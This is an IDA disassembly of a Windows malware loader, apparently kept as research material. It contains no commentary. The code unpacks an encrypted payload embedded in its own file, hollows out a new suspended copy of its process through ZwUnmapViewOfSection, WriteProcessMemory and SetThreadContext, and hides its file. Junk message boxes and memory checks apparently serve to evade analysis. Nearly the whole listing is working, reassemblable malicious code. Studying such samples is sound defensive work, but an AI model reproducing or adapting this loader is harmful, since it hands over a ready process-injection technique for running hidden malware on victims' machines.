;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B3E91556B1CA09B3D3BBE3B0C2D33F10
; File Name : u:\work\b3e91556b1ca09b3d3bbe3b0c2d33f10_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006A22 ( 27170.)
; Section size in file : 00006C00 ( 27648.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4017D8+B1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_8]
imul edi, 64h
push edi ; Size
call _malloc
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_401085
push ebx
push offset LibFileName ; "ntdll.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_401082
push esi
mov esi, ds:GetProcAddress
push offset ProcName ; "RtlDecompressBuffer"
push ebx ; hModule
call esi ; GetProcAddress
push offset aRtlgetcompress ; "RtlGetCompressionWorkSpaceSize"
push ebx ; hModule
mov [ebp+var_4], eax
call esi ; GetProcAddress
cmp [ebp+arg_8], 0
pop esi
jz short loc_401082
cmp [ebp+var_4], 0
jz short loc_401082
test eax, eax
jz short loc_401082
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_10]
push ecx
push 2
call eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
push edi
push [ebp+var_8]
push 2
call [ebp+var_4]
push ebx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
mov eax, [ebp+var_8]
jmp short loc_401084
; ---------------------------------------------------------------------------
loc_401082: ; CODE XREF: sub_401000+2B�j
; sub_401000+4C�j ...
xor eax, eax
loc_401084: ; CODE XREF: sub_401000+80�j
pop ebx
loc_401085: ; CODE XREF: sub_401000+19�j
pop edi
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401088 proc near ; CODE XREF: sub_4010CE+5B�p
; sub_4010CE+B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_4010AC
mov ecx, [esp+arg_0]
mov edx, dword_40A5E4
add ecx, edx
loc_40109C: ; CODE XREF: sub_401088+22�j
mov dl, [ecx+eax]
mov byte_40A620[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_40109C
locret_4010AC: ; CODE XREF: sub_401088+6�j
retn
sub_401088 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4010AD(HWND hWnd, int)
sub_4010AD proc near ; CODE XREF: sub_401522+8E�p
hWnd = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 2925h
jnz short locret_4010CD
push 0 ; uType
push offset Caption ; "ghgfhgfhgfdh gfdhgfdhfdkjhityru67uiytui"...
push offset Text ; "uiytrikjhgkjhgkjhgkjhgkjhg"
push [esp+0Ch+hWnd] ; hWnd
call ds:MessageBoxA ; MessageBoxA
locret_4010CD: ; CODE XREF: sub_4010AD+8�j
retn
sub_4010AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CE proc near ; CODE XREF: WinMain(x,x,x,x)+71�p
var_13C = byte ptr -13Ch
Dst = word ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_40A040
mov ecx, dword_40A5E4
push ebx
push esi
lea esi, [ecx+eax]
mov bl, [esi]
mov byte_40A5EC, bl
mov cl, [esi+1]
push edi
mov edi, nNumberOfBytesToRead
mov byte_40A61C, cl
mov cl, [esi+2]
neg byte_40A61C
sub edi, eax
neg bl
neg cl
cmp edi, 40h
mov byte_40A5EC, bl
mov byte_40A5E0, cl
jb loc_4011CC
add eax, 3
push 40h
push eax
call sub_401088
pop ecx
pop ecx
mov byte_40A660, 0
xor esi, esi
loc_401139: ; CODE XREF: sub_4010CE+81�j
mov cl, byte_40A61C
lea eax, dword_40A621[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_401139
push 40h ; Size
mov ebx, offset byte_40A620
lea eax, [ebp+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+Dst], 5A4Dh
jnz short loc_4011CC
mov eax, [ebp+var_20]
lea ecx, [eax+18h]
cmp edi, ecx
jb short loc_4011CC
mov ecx, dword_40A040
lea eax, [ecx+eax+3]
push 18h
push eax
call sub_401088
pop ecx
pop ecx
mov byte_40A638, 0
xor esi, esi
loc_401194: ; CODE XREF: sub_4010CE+E2�j
mov cl, byte_40A5EC
lea eax, dword_40A621[esi]
add [eax-1], cl
mov cl, byte_40A61C
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401194
push 18h ; Size
lea eax, [ebp+var_1C]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, 0E0h
add esp, 0Ch
cmp [ebp+var_8], si
jz short loc_4011D3
loc_4011CC: ; CODE XREF: sub_4010CE+4F�j
; sub_4010CE+9D�j ...
xor al, al
jmp loc_4012B9
; ---------------------------------------------------------------------------
loc_4011D3: ; CODE XREF: sub_4010CE+FC�j
mov ecx, dword_40A040
mov eax, [ebp+var_20]
lea eax, [ecx+eax+1Bh]
push esi
push eax
call sub_401088
pop ecx
pop ecx
mov byte_40A700, 0
xor edi, edi
loc_4011F2: ; CODE XREF: sub_4010CE+13F�j
mov cl, byte_40A5EC
lea eax, dword_40A621[edi]
add [eax-1], cl
mov cl, byte_40A61C
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4011F2
push esi ; Size
lea eax, [ebp+var_13C]
push ebx ; Src
push eax ; Dst
call _memcpy
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; dwBytes
call ??2@YAPAXI@Z ; operator new(uint)
movzx esi, [ebp+var_16]
mov ecx, dword_40A040
mov [ebp+var_4], eax
mov eax, [ebp+var_20]
lea esi, [esi+esi*4]
shl esi, 3
lea eax, [ecx+eax+0FBh]
push esi
push eax
call sub_401088
add esp, 18h
xor ecx, ecx
test esi, esi
mov byte_40A620[esi], 0
jbe short loc_40127E
loc_401261: ; CODE XREF: sub_4010CE+1AE�j
mov dl, byte_40A5EC
lea eax, dword_40A621[ecx]
add [eax-1], dl
mov dl, byte_40A61C
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_401261
loc_40127E: ; CODE XREF: sub_4010CE+191�j
push esi ; Size
push ebx ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_0]
mov eax, [ebp+arg_10]
add esp, 0Ch
push 10h
pop ecx
push 6
lea esi, [ebp+Dst]
rep movsd
mov edi, [ebp+arg_8]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_C]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov ecx, [ebp+var_4]
mov [eax], ecx
mov al, 1
loc_4012B9: ; CODE XREF: sub_4010CE+100�j
pop edi
pop esi
pop ebx
leave
retn
sub_4010CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012BE proc near ; CODE XREF: WinMain(x,x,x,x)+93�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_4012DB
lea ecx, [eax+1]
imul ecx, esi
loc_4012DB: ; CODE XREF: sub_4012BE+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401315
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_4012F1: ; CODE XREF: sub_4012BE+53�j
mov edi, [ebx]
test edi, edi
jz short loc_40130B
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_401305
add ecx, edi
jmp short loc_40130B
; ---------------------------------------------------------------------------
loc_401305: ; CODE XREF: sub_4012BE+41�j
inc eax
imul eax, esi
add ecx, eax
loc_40130B: ; CODE XREF: sub_4012BE+37�j
; sub_4012BE+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_4012F1
pop edi
pop ebx
loc_401315: ; CODE XREF: sub_4012BE+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_4012BE endp
; =============== S U B R O U T I N E =======================================
sub_40131A proc near ; CODE XREF: sub_401334+A9�p
; sub_401334+12D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_40132D
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131A+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_40131A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401334(int, int, int, size_t Size, int, void *Dst)
sub_401334 proc near ; CODE XREF: WinMain(x,x,x,x)+C1�p
arg_4 = dword ptr 0Ch
Size = dword ptr 14h
arg_10 = dword ptr 18h
Dst = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, dword_40A5E4
push ebx
push esi
mov esi, dword_40A040
add eax, esi
mov bl, [eax]
mov byte_40A5EC, bl
mov cl, [eax+1]
mov byte_40A61C, cl
mov al, [eax+2]
neg byte_40A61C
neg al
mov byte_40A5E0, al
mov eax, [ebp+Size]
neg bl
mov byte_40A5EC, bl
push edi
mov edi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401395
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_401387: ; CODE XREF: sub_401334+5F�j
mov edx, [ecx]
cmp edx, edi
jnb short loc_40138F
mov edi, edx
loc_40138F: ; CODE XREF: sub_401334+57�j
add ecx, 28h
dec eax
jnz short loc_401387
loc_401395: ; CODE XREF: sub_401334+4B�j
push edi
add esi, 3
push esi
call sub_401088
pop ecx
xor esi, esi
test edi, edi
pop ecx
mov byte_40A620[edi], 0
jbe short loc_4013C5
loc_4013AE: ; CODE XREF: sub_401334+8F�j
mov cl, byte_40A61C
lea eax, dword_40A621[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, edi
jb short loc_4013AE
loc_4013C5: ; CODE XREF: sub_401334+78�j
push edi ; Size
push offset byte_40A620 ; Src
push [ebp+Dst] ; Dst
call _memcpy
mov ebx, [ebp+Size]
mov ecx, [ebx+20h]
push ecx
push dword ptr [ebx+3Ch]
call sub_40131A
mov edi, eax
add edi, [ebp+Dst]
mov eax, [ebp+arg_4]
and [ebp+Dst], 0
add esp, 14h
cmp word ptr [eax+6], 0
jbe loc_401493
mov esi, [ebp+arg_10]
add esi, 8
loc_401402: ; CODE XREF: sub_401334+159�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40146B
mov [ebp+Size], eax
mov eax, [esi]
cmp [ebp+Size], eax
jbe short loc_401416
mov [ebp+Size], eax
loc_401416: ; CODE XREF: sub_401334+DD�j
mov eax, [esi+0Ch]
mov ecx, dword_40A040
push [ebp+Size]
lea eax, [eax+ecx+3]
push eax
call sub_401088
mov eax, [ebp+Size]
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
mov byte_40A620[eax], 0
jbe short loc_40144F
loc_40143E: ; CODE XREF: sub_401334+119�j
mov dl, byte_40A5E0
add byte_40A620[ecx], dl
inc ecx
cmp ecx, eax
jb short loc_40143E
loc_40144F: ; CODE XREF: sub_401334+108�j
push eax ; Size
push offset byte_40A620 ; Src
push edi ; Dst
call _memcpy
mov ecx, [ebx+20h]
push ecx
push dword ptr [esi]
call sub_40131A
add esp, 14h
jmp short loc_40147B
; ---------------------------------------------------------------------------
loc_40146B: ; CODE XREF: sub_401334+D3�j
mov eax, [esi]
test eax, eax
jz short loc_40147D
push ecx
push eax
call sub_40131A
add esp, 8
loc_40147B: ; CODE XREF: sub_401334+135�j
add edi, eax
loc_40147D: ; CODE XREF: sub_401334+13B�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+Dst]
add esi, 28h
cmp [ebp+Dst], eax
jl loc_401402
loc_401493: ; CODE XREF: sub_401334+C2�j
pop edi
pop esi
mov al, 1
pop ebx
pop ebp
retn
sub_401334 endp
; =============== S U B R O U T I N E =======================================
sub_40149A proc near ; CODE XREF: sub_40165D+BD�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_8]
mov eax, [ecx+88h]
test eax, eax
jz short locret_401509
cmp dword ptr [ecx+8Ch], 0
jz short locret_401509
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [ecx+1Ch]
add eax, edx
cmp dword ptr [eax+4], 0
jz short loc_401508
push ebx
push edi
loc_4014C7: ; CODE XREF: sub_40149A+6A�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
test ecx, ecx
lea edi, [eax+8]
jle short loc_4014FE
mov ebx, ecx
loc_4014D8: ; CODE XREF: sub_40149A+62�j
xor edx, edx
mov dx, [edi]
mov ecx, edx
and ecx, 0FFFh
add ecx, [esp+0Ch+arg_10]
and dx, 0F000h
add ecx, [eax]
cmp dx, 3000h
jnz short loc_4014F9
add [ecx], esi
loc_4014F9: ; CODE XREF: sub_40149A+5B�j
inc edi
inc edi
dec ebx
jnz short loc_4014D8
loc_4014FE: ; CODE XREF: sub_40149A+3A�j
cmp dword ptr [edi+4], 0
mov eax, edi
jnz short loc_4014C7
pop edi
pop ebx
loc_401508: ; CODE XREF: sub_40149A+29�j
pop esi
locret_401509: ; CODE XREF: sub_40149A+C�j
; sub_40149A+15�j
retn
sub_40149A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40150A(int, HANDLE hProcess, LPCVOID lpAddress, SIZE_T dwLength)
sub_40150A proc near ; CODE XREF: sub_401522+99�p
; sub_401522+FE�p
hProcess = dword ptr 8
lpAddress = dword ptr 0Ch
dwLength = dword ptr 10h
push [esp+dwLength] ; dwLength
push offset Buffer ; lpBuffer
push [esp+8+lpAddress] ; lpAddress
push [esp+0Ch+hProcess] ; hProcess
call ds:VirtualQueryEx ; VirtualQueryEx
retn
sub_40150A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401522(LPSTR lpCommandLine, LPPROCESS_INFORMATION lpProcessInformation, int, LPCONTEXT lpContext, LPVOID lpBuffer)
sub_401522 proc near ; CODE XREF: WinMain(x,x,x,x)+DE�p
StartupInfo = _STARTUPINFOA ptr -4Ch
var_8 = dword ptr -8
NumberOfBytesRead= dword ptr -4
lpCommandLine = dword ptr 8
lpProcessInformation= dword ptr 0Ch
lpContext = dword ptr 14h
lpBuffer = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push edi
push 10h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+StartupInfo.cb], ebx
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
mov edi, [ebp+lpProcessInformation]
push edi ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push ebx ; lpCurrentDirectory
push ebx ; lpEnvironment
push 4 ; dwCreationFlags
push ebx ; bInheritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
push ebx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz loc_40163A
push esi
mov esi, [ebp+lpContext]
push esi ; lpContext
mov dword ptr [esi], 10007h
push dword ptr [edi+4] ; hThread
call ds:GetThreadContext ; GetThreadContext
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov eax, [esi+0A4h]
push 4 ; nSize
push [ebp+lpBuffer] ; lpBuffer
add eax, 8
push eax ; lpBaseAddress
push dword ptr [edi] ; hProcess
call ds:ReadProcessMemory ; ReadProcessMemory
mov eax, [ebp+lpBuffer]
mov esi, [eax]
mov eax, [ebp+NumberOfBytesRead]
add eax, esi
test eax, eax
mov [ebp+var_8], eax
fild [ebp+var_8]
jge short loc_4015A3
fadd ds:dbl_408230
loc_4015A3: ; CODE XREF: sub_401522+79�j
fadd ds:dbl_408228
call __ftol2
push eax ; int
push ebx ; hWnd
call sub_4010AD
push 1Ch ; dwLength
push esi ; lpAddress
push dword ptr [edi] ; hProcess
push ebx ; int
call sub_40150A
add esp, 18h
jmp short loc_401628
; ---------------------------------------------------------------------------
loc_4015C5: ; CODE XREF: sub_401522+108�j
cmp Buffer.State, 10000h
jz short loc_40162C
add esi, Buffer.RegionSize
lea eax, [esi+64h]
cmp eax, 77AA32h
jnz short loc_40161A
lea eax, [esi+0C8h]
cmp eax, 3ECACB2h
jnz short loc_40161A
lea eax, [esi+12Ch]
cmp eax, 344D3F2h
jnz short loc_40161A
lea eax, [esi+190h]
cmp eax, 0BA1F2h
jnz short loc_40161A
push ebx ; uType
push offset byte_408226 ; lpCaption
push offset aGyuyyyyyyyyhgg ; "gyuyyyyyyyyhggggggggggfdgfdhjhhhhhhhhhh"...
push ebx ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_40161A: ; CODE XREF: sub_401522+BD�j
; sub_401522+CA�j ...
push 1Ch ; dwLength
push esi ; lpAddress
push dword ptr [edi] ; hProcess
push ebx ; int
call sub_40150A
add esp, 10h
loc_401628: ; CODE XREF: sub_401522+A1�j
test eax, eax
jnz short loc_4015C5
loc_40162C: ; CODE XREF: sub_401522+AD�j
mov eax, [ebp+lpBuffer]
sub esi, [eax]
mov [eax+4], esi
xor eax, eax
inc eax
pop esi
jmp short loc_40163C
; ---------------------------------------------------------------------------
loc_40163A: ; CODE XREF: sub_401522+32�j
xor eax, eax
loc_40163C: ; CODE XREF: sub_401522+116�j
pop edi
pop ebx
leave
retn
sub_401522 endp
; =============== S U B R O U T I N E =======================================
sub_401640 proc near ; CODE XREF: sub_40165D+83�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_40165A
cmp dword ptr [eax+8Ch], 0
jz short loc_40165A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40165A: ; CODE XREF: sub_401640+B�j
; sub_401640+14�j
xor eax, eax
retn
sub_401640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40165D proc near ; CODE XREF: WinMain(x,x,x,x)+13F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
flOldProtect = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
hProcess = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_30 = dword ptr 38h
arg_D4 = dword ptr 0DCh
arg_E0 = dword ptr 0E8h
lpAddress = dword ptr 304h
dwSize = dword ptr 308h
push ebp
mov ebp, esp
mov eax, [ebp+lpAddress]
push ebx
mov ebx, [ebp+flOldProtect]
cmp [ebx+1Ch], eax
push esi
mov esi, ds:VirtualAllocEx
push edi
mov edi, 3000h
jnz short loc_40169F
mov ecx, [ebp+dwSize]
cmp [ebp+arg_18], ecx
ja short loc_40169F
lea edx, [ebp+flOldProtect]
push edx ; lpflOldProtect
push 40h ; flNewProtect
push ecx ; dwSize
push eax ; lpAddress
push [ebp+hProcess] ; hProcess
mov dword_444928, eax
call ds:VirtualProtectEx ; VirtualProtectEx
jmp short loc_4016D6
; ---------------------------------------------------------------------------
loc_40169F: ; CODE XREF: sub_40165D+1D�j
; sub_40165D+28�j
mov ecx, [ebp+hProcess]
push eax
push ecx
mov dword_40A618, ecx
mov dword_444918, eax
call dword_44492C ; ZwUnmapViewOfSection
test eax, eax
jnz short loc_4016BD
mov byte ptr [ebp+flOldProtect+3], 1
loc_4016BD: ; CODE XREF: sub_40165D+5A�j
cmp byte ptr [ebp+flOldProtect+3], 1
jnz short loc_4016D6
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_18] ; dwSize
push dword ptr [ebx+1Ch] ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
mov dword_444928, eax
loc_4016D6: ; CODE XREF: sub_40165D+40�j
; sub_40165D+64�j
cmp dword_444928, 0
jnz short loc_40172F
push ebx
call sub_401640
add esp, 4
test eax, eax
jz loc_4017BD
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_18] ; dwSize
push 0 ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
test eax, eax
mov dword_444928, eax
jz loc_4017BD
push 0
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40149A
add esp, 1Ch
cmp dword_444928, 0
jz loc_4017BD
loc_40172F: ; CODE XREF: sub_40165D+80�j
mov esi, [ebp+arg_D4]
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push 0
push 4
push offset dword_444928
add esi, 8
push esi
mov esi, [ebp+hProcess]
push esi
call eax
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_444928
mov edx, [ebp+arg_14]
mov [eax+edx+34h], ecx
mov eax, dword_444928
cmp eax, [ebp+lpAddress]
mov [ebp+arg_30], 10007h
jnz short loc_401794
mov eax, [ebx+10h]
add eax, [ebx+1Ch]
mov [ebp+arg_E0], eax
jmp short loc_40179F
; ---------------------------------------------------------------------------
loc_401794: ; CODE XREF: sub_40165D+127�j
mov ecx, [ebx+10h]
add ecx, eax
mov [ebp+arg_E0], ecx
loc_40179F: ; CODE XREF: sub_40165D+135�j
mov eax, [ebp+arg_24]
lea ecx, [ebp+arg_30]
push ecx
push eax
mov dword_44491C, esi
mov hThread, eax
call dword_444930 ; SetThreadContext
xor eax, eax
inc eax
jmp short loc_4017BF
; ---------------------------------------------------------------------------
loc_4017BD: ; CODE XREF: sub_40165D+8D�j
; sub_40165D+A7�j ...
xor eax, eax
loc_4017BF: ; CODE XREF: sub_40165D+15E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40165D endp
; =============== S U B R O U T I N E =======================================
sub_4017C4 proc near ; CODE XREF: WinMain(x,x,x,x)+16E�p
push hThread ; hThread
mov byte_444920, 1
call ds:ResumeThread ; ResumeThread
retn
sub_4017C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4017D8(int, LPCSTR lpFileName)
sub_4017D8 proc near ; CODE XREF: WinMain(x,x,x,x)+29�p
NumberOfBytesRead= dword ptr -4
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
push ebx ; lpFileSizeHigh
push eax ; hFile
mov hFile, eax
call ds:GetFileSize ; GetFileSize
mov nNumberOfBytesToRead, eax
inc eax
push eax ; Size
call _malloc
pop ecx
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
push nNumberOfBytesToRead ; nNumberOfBytesToRead
mov dword_40A5E4, eax
push eax ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile
mov eax, [ebp+NumberOfBytesRead]
sub eax, dword_40A040
inc eax
push eax ; Size
call _malloc
mov esi, eax
mov eax, [ebp+NumberOfBytesRead]
pop ecx
mov ecx, dword_40A040
xor edx, edx
sub eax, ecx
jz short loc_40186F
loc_401852: ; CODE XREF: sub_4017D8+95�j
mov eax, dword_40A5E4
add ecx, eax
mov al, [ecx+edx]
mov [edx+esi], al
mov eax, [ebp+NumberOfBytesRead]
mov ecx, dword_40A040
inc edx
sub eax, ecx
cmp edx, eax
jb short loc_401852
loc_40186F: ; CODE XREF: sub_4017D8+78�j
mov eax, esi
sub eax, ecx
mov ecx, [ebp+NumberOfBytesRead]
mov [eax+ecx], bl
lea eax, [ebp+NumberOfBytesRead]
push eax
mov eax, [ebp+NumberOfBytesRead]
sub eax, dword_40A040
push eax
push ebx
push esi
call sub_401000
add esp, 10h
pop esi
mov dword_40A040, ebx
mov dword_40A5E4, eax
pop ebx
leave
retn
sub_4017D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
Context = CONTEXT ptr -52Ch
flOldProtect = dword ptr -260h
FileName = byte ptr -180h
var_80 = dword ptr -80h
ProcessInformation= _PROCESS_INFORMATION ptr -40h
var_30 = dword ptr -30h
Buffer = dword ptr -18h
dwSize = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 52Ch
push ebx
push esi
push edi
push 100h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
xor ebx, ebx
push ebx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+FileName]
push eax ; lpFileName
push ebx ; int
call sub_4017D8
pop ecx
pop ecx
push 6 ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
mov esi, ds:GetModuleHandleA
push offset aVirtualalloc ; "VirtualAlloc"
push offset ModuleName ; "kernel32.dll"
call esi ; GetModuleHandleA
mov edi, ds:GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_80]
push ebx
push eax
call sub_4010CE
add esp, 14h
test al, al
jz loc_401A15
push [ebp+var_8]
lea eax, [ebp+flOldProtect]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_80]
push eax
call sub_4012BE
add esp, 10h
push 40h
push 1000h
push eax
push ebx
mov [ebp+var_C], eax
call [ebp+var_4]
push eax ; Dst
push [ebp+var_8] ; int
mov [ebp+var_4], eax
lea eax, [ebp+flOldProtect]
push eax ; Size
push ebx ; int
lea eax, [ebp+var_30]
push eax ; int
lea eax, [ebp+var_80]
push eax ; int
call sub_401334
push ebx
lea eax, [ebp+Buffer]
push eax ; lpBuffer
lea eax, [ebp+Context]
push eax ; lpContext
push ebx ; int
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+FileName]
push eax ; lpCommandLine
call sub_401522
add esp, 30h
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
push [ebp+dwSize] ; dwSize
mov [ebp+var_10], eax
push [ebp+Buffer] ; lpAddress
mov ecx, 0B3h
sub esp, 2CCh
mov edi, esp
sub esp, 10h
lea esi, [ebp+Context]
rep movsd
mov edi, esp
lea eax, [ebp+FileName]
push eax ; int
push [ebp+var_C] ; int
lea esi, [ebp+ProcessInformation]
push [ebp+var_4] ; int
movsd
push [ebp+var_8] ; int
movsd
lea eax, [ebp+flOldProtect]
push eax ; flOldProtect
push ebx ; int
lea eax, [ebp+var_30]
movsd
push eax ; int
lea eax, [ebp+var_80]
push eax ; int
movsd
call sub_40165D
add esp, 304h
push ebx
push [ebp+var_C]
push [ebp+var_4]
push dword_444928
push dword_44491C
call [ebp+var_10]
test eax, eax
setnz al
mov byte_444920, al
push [ebp+var_C]
push ebx
call sub_4017C4
pop ecx
pop ecx
loc_401A15: ; CODE XREF: WinMain(x,x,x,x)+7B�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
